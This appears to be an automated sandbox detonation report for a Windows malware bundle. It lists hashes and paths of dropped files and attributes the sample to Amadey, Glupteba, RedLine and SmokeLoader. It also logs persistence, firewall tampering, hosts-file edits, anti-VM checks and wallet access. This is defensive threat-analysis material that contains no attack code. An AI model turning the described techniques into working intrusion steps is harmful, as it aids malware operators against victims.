SHA1 9dd9080df32b375f39df6470136a5bb107829eba
SHA256 f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428
SHA512 e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753

\Users\Admin\AppData\Local\Temp\1000201001\setup.exe

MD5 2d257873ee0ae75c9b89bd340e3e3da6
SHA1 9dd9080df32b375f39df6470136a5bb107829eba
SHA256 f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428
SHA512 e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753

memory/1308-81-0x0000000000260000-0x0000000000286000-memory.dmp

memory/1308-82-0x00000000002F0000-0x0000000000330000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 8670305fdaf49dc2fd18804bc8000bd2
SHA1 a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256 f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA512 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1

\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 8670305fdaf49dc2fd18804bc8000bd2
SHA1 a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256 f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA512 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1

memory/948-98-0x0000000000970000-0x0000000000A2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

memory/1308-109-0x0000000000400000-0x00000000017FB000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

MD5 e858e636547aa1dff328554f5750cb37
SHA1 a96483d7314414755ae9f89e389843ae35d3fece
SHA256 7a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222
SHA512 4f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30

\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

MD5 e858e636547aa1dff328554f5750cb37
SHA1 a96483d7314414755ae9f89e389843ae35d3fece
SHA256 7a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222
SHA512 4f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30

memory/624-131-0x00000000001B0000-0x00000000001C5000-memory.dmp

memory/1044-138-0x00000000777F0000-0x00000000777F2000-memory.dmp

memory/624-137-0x00000000001D0000-0x00000000001D9000-memory.dmp

memory/1044-140-0x00000000777F0000-0x00000000777F2000-memory.dmp

memory/1044-142-0x0000000077800000-0x0000000077802000-memory.dmp

memory/1044-141-0x0000000077800000-0x0000000077802000-memory.dmp

memory/1044-139-0x00000000777F0000-0x00000000777F2000-memory.dmp

memory/1044-143-0x0000000077800000-0x0000000077802000-memory.dmp

memory/108-135-0x0000000000400000-0x0000000000409000-memory.dmp

memory/108-134-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1044-145-0x0000000077810000-0x0000000077812000-memory.dmp

memory/1044-146-0x0000000077810000-0x0000000077812000-memory.dmp

memory/1044-155-0x000007FEFD520000-0x000007FEFD522000-memory.dmp

memory/1044-154-0x000007FEFD520000-0x000007FEFD522000-memory.dmp

memory/1044-152-0x000007FEFD510000-0x000007FEFD512000-memory.dmp

memory/1044-151-0x000007FEFD510000-0x000007FEFD512000-memory.dmp

memory/1044-149-0x0000000077820000-0x0000000077822000-memory.dmp

memory/1044-148-0x0000000077820000-0x0000000077822000-memory.dmp

memory/1044-147-0x0000000077820000-0x0000000077822000-memory.dmp

memory/1044-156-0x000000013F6A0000-0x0000000140E69000-memory.dmp

memory/1044-144-0x0000000077810000-0x0000000077812000-memory.dmp

memory/108-159-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1204-170-0x0000000002BB0000-0x0000000002BC6000-memory.dmp

memory/108-172-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1764-193-0x000000013F6A0000-0x0000000140E69000-memory.dmp

memory/948-196-0x00000000001F0000-0x000000000020C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/948-198-0x0000000005030000-0x0000000005070000-memory.dmp

memory/948-208-0x00000000001F0000-0x0000000000205000-memory.dmp

memory/948-207-0x00000000001F0000-0x0000000000205000-memory.dmp

memory/948-210-0x00000000001F0000-0x0000000000205000-memory.dmp

memory/948-212-0x00000000001F0000-0x0000000000205000-memory.dmp

memory/948-214-0x00000000001F0000-0x0000000000205000-memory.dmp

memory/948-216-0x00000000001F0000-0x0000000000205000-memory.dmp

memory/948-218-0x00000000001F0000-0x0000000000205000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/948-239-0x0000000000260000-0x0000000000261000-memory.dmp

memory/1928-245-0x0000000002B10000-0x00000000033FB000-memory.dmp

memory/1732-258-0x0000000000400000-0x0000000000426000-memory.dmp

memory/1732-263-0x0000000004C50000-0x0000000004C90000-memory.dmp

memory/924-265-0x0000000000910000-0x0000000000950000-memory.dmp

memory/924-296-0x00000000003D0000-0x00000000003D1000-memory.dmp

memory/1676-314-0x0000000000810000-0x0000000000850000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/1248-326-0x0000000004EB0000-0x0000000004EF0000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

memory/924-367-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/956-368-0x0000000004AA0000-0x0000000004AE0000-memory.dmp

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/924-401-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/1204-423-0x000007FEB0990000-0x000007FEB099A000-memory.dmp

memory/2320-428-0x000000001B140000-0x000000001B422000-memory.dmp

memory/2320-430-0x0000000001F80000-0x0000000001F88000-memory.dmp

memory/2320-431-0x0000000002760000-0x00000000027E0000-memory.dmp

memory/2320-432-0x0000000002760000-0x00000000027E0000-memory.dmp

memory/2320-433-0x0000000002760000-0x00000000027E0000-memory.dmp

memory/2320-434-0x000000000276B000-0x00000000027A2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 430d7647b8c46c207dc007b48fe836ae
SHA1 e3e3b306e9b897647bdf16dbcb4f81bc58a929ff
SHA256 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f
SHA512 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FDYWHJ6UDQO96NWP1PW3.temp

MD5 430d7647b8c46c207dc007b48fe836ae
SHA1 e3e3b306e9b897647bdf16dbcb4f81bc58a929ff
SHA256 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f
SHA512 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95

memory/2528-441-0x000000001AFF0000-0x000000001B2D2000-memory.dmp

memory/2528-442-0x0000000002320000-0x0000000002328000-memory.dmp

memory/2528-446-0x00000000023D0000-0x0000000002450000-memory.dmp

memory/2528-447-0x00000000023D0000-0x0000000002450000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

C:\Program Files\Google\Chrome\updater.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

memory/2740-458-0x0000000002720000-0x00000000027A0000-memory.dmp

memory/2740-459-0x0000000002724000-0x0000000002727000-memory.dmp

memory/2740-460-0x000000000272B000-0x0000000002762000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 3e9af076957c5b2f9c9ce5ec994bea05
SHA1 a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256 e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2956-470-0x000000000271B000-0x0000000002752000-memory.dmp

memory/2956-469-0x0000000002714000-0x0000000002717000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 430d7647b8c46c207dc007b48fe836ae
SHA1 e3e3b306e9b897647bdf16dbcb4f81bc58a929ff
SHA256 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f
SHA512 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95

C:\Windows\System32\drivers\etc\hosts

MD5 3e9af076957c5b2f9c9ce5ec994bea05
SHA1 a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256 e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7029e43242271f90359ed8193c1e4848
SHA1 b9d38c911e4b2e6cb03a242b02022e7ff365e150
SHA256 1a5f3744d5c71f5c96cf706649a8a3fb93b12f406562dd5fb142a94c4097017b
SHA512 2a03d3b38f8708e8b10c367451a2787f38da2ba8c0a487dfcd7ac962970e99060a41ef3278f2ca9b0c2c6bf1ac9c9529fac8f198ee3f9ca75aa896373da568ff

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-02 00:14

Reported

2023-07-02 00:17

Platform

win10v2004-20230621-en

Max time kernel

103s

Max time network

153s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

GCleaner

loader gcleaner

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2636 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 2636 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 2636 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 2636 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1284 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 2636 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1284 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1284 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1284 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1496 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1284 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1496 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1496 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1496 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1496 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 5092 created 3172 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\oneetx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
